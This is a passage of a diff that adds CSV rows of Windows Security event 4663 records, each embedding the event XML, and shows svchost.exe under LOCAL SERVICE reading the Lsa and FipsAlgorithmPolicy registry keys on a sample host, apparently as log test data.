+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452881</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452880</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452879</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452878</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452877</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452876</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452875</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452874</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452873</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452872</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452871</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452870</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452869</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452868</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452867</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452866</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452865</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
